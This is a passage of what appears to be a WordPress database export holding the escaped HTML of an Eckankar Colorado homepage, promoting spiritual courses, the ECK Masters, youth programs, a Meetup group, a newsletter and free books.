ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241317,41019,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open 